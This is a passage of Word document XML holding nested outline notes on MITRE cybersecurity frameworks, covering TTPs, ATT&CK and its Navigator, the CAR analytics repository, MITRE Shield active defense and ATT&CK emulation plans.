    <w:p w14:paraId="7FF160D6" w14:textId="6ADE9F8A" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00970611" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.fireeye.com/current-threats/apt-groups.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00A534FA" w14:textId="6B2734CF" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TTP – Tactics, Techniques, and Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21DD30" w14:textId="4066C827" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tactic – adversary goal or objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42196219" w14:textId="38F0CE74" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Technique – how the goal is achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092CF763" w14:textId="7F1E13CC" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Procedure – how the technique is executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA720B" w14:textId="70D7AB9B" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF4116" w14:textId="128C38FF" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>globally-accessible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> knowledge base of adversary tactics and techniques based on real-world observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28734004" w14:textId="2C9DFA92" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>address need to record common TTPs of APTs against Windows Enterprise networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A27966" w14:textId="0DEE8E14" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>started with Fort Meade Experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD4B97" w14:textId="3EAF477E" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>security professionals tasked to emulate TTPs to collect data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655690CD" w14:textId="3974A7C1" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="00320395" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B5B6BB5" w14:textId="0F7A49F5" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Matrix For Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173FBC4" w14:textId="3BCA401D" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>fourteen categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A7DC3" w14:textId="3A73DC2B" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>seven stage Cyber Attack Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2288E" w14:textId="240A8CCE" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cyber Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C88251" w14:textId="05AC8CC2" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0A2ED" w14:textId="4918CF5F" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>nine techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D855DD" w14:textId="25644341" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sub-techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64CEF4" w14:textId="79869BA9" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dedicated pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EA60B" w14:textId="3DD516B3" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>procedure examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4A6D2" w14:textId="422F1CC8" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246FF356" w14:textId="769351B1" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MITRE ATT&amp;CK Navigator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1F6F4" w14:textId="4477429A" w:rsidR="00320395" w:rsidRPr="0084205E" w:rsidRDefault="00320395" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>selection controls, layer controls, technique controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42E8AF" w14:textId="7835ED83" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>CAR Knowledge Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E5A9A2" w14:textId="71E93B3C" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cyber Analytics Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92729F" w14:textId="35A156E3" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>knowledgebase of analytics developed by MITRE based on ATT&amp;CK adversary model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F1650" w14:textId="2A8E2A5A" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Provides description of analytics and references to ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB7E03" w14:textId="583F799A" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>technique, sub-technique, tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628E8A2" w14:textId="3D6562C3" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pseudocode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AAF39" w14:textId="0D542D90" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EQL version of pseudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAFA36" w14:textId="60965A52" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Full Analytic List &amp; CAR ATT&amp;CK Navigator Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313E36B" w14:textId="03B04F9D" w:rsidR="00446A7B" w:rsidRPr="0084205E" w:rsidRDefault="00446A7B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>techniques highlighted in blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAFB26" w14:textId="3DAA9CDC" w:rsidR="002577C1" w:rsidRPr="0084205E" w:rsidRDefault="002577C1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MITRE | SHIELD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1077B" w14:textId="264AC4C5" w:rsidR="00970611" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active defense knowledge base developed to capture and organize active defense and adversary engagement knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B81F3" w14:textId="2D11A354" w:rsidR="004B535B" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>trap and engage with an adversary active within the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3A7F5" w14:textId="5895CE25" w:rsidR="004B535B" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>decoys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06124B3E" w14:textId="6BACF742" w:rsidR="004B535B" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596869A" w14:textId="05E68205" w:rsidR="004B535B" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Channel, Collect, Contain, Detect, Disrupt, Facilitate, Legitimize, Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716B442" w14:textId="3CA8E13F" w:rsidR="004B535B" w:rsidRPr="0084205E" w:rsidRDefault="004B535B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>opportunities, use cases, procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D5F4B2" w14:textId="0E3ED720" w:rsidR="00492C5E" w:rsidRPr="0084205E" w:rsidRDefault="00492C5E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF97B5" w14:textId="07903A01" w:rsidR="00492C5E" w:rsidRPr="0084205E" w:rsidRDefault="00492C5E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Detect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430DE53F" w14:textId="4380B80E" w:rsidR="00492C5E" w:rsidRPr="0084205E" w:rsidRDefault="00492C5E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK Emulation Plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C21C8AD" w14:textId="3D55BABE" w:rsidR="00492C5E" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MITRE ENGENUITY, CTID, Adversary Emulation Library, ATT&amp;CK Emulation Plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9D61B" w14:textId="5A7E84E7" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CITD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD7D71" w14:textId="75E3E6BB" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>conduct research on cyber threats and TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43179DA7" w14:textId="61C85113" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adversary Emulation Library &amp; ATT&amp;CK Emulations Plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB425B" w14:textId="4BDD6944" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>public library for blue/red teamers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C279A" w14:textId="680BC3D5" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
